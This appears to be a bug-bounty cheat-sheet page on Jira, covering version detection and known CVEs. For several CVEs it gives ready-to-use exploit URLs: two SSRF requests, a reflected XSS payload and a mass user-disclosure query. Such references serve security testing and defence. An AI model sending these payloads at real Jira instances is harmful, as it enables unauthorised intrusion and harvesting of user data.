search

Jira Common Bugs

hashtag
Introduction

What would you do if you came across a website that uses Jira?

hashtag
How to Detect

Try to HTTP request to https://example.com/secure/Dashboard.jspa or https://example.com/login.jsp and there is a form login

  1. Find the related CVE by checking jira version

  • How to find the jira version

Try to request to https://example.com/secure/Dashboard.jspa and then check the source code. You will find this line <meta name="ajs-version-number" content="8.20.9"> so 8.20.9 is the jira version. If you found outdated jira version, find the CVEs at CVEDetailsarrow-up-right

Some example CVE:

  • CVE-2017-9506 (SSRF)

https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>

  • CVE-2018-20824 (XSS)

https://example.com/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)

  • CVE-2019-8451 (SSRF)

https://example.com/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:1337@example.com

  • CVE-2019-8449 (User Information Disclosure)

https://example.com/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true

  • CVE-2019-8442 (Sensitive Information Disclosure)

  • CVE-2019-3403 (User Enumeration)

  • CVE-2020-14181 (User Enumeration)

  • CVE-2020-14178 (Project Key Enumeration)

  • CVE-2020-14179 (Information Disclosure)

  • CVE-2019-11581 (Template Injection)

  • CVE-2019-3396 (Path Traversal)

  • CVE-2019-3402 (XSS)

  1. Signup enabled

hashtag
Reference

PreviousJenkins Common BugsNextGrafana

Last updated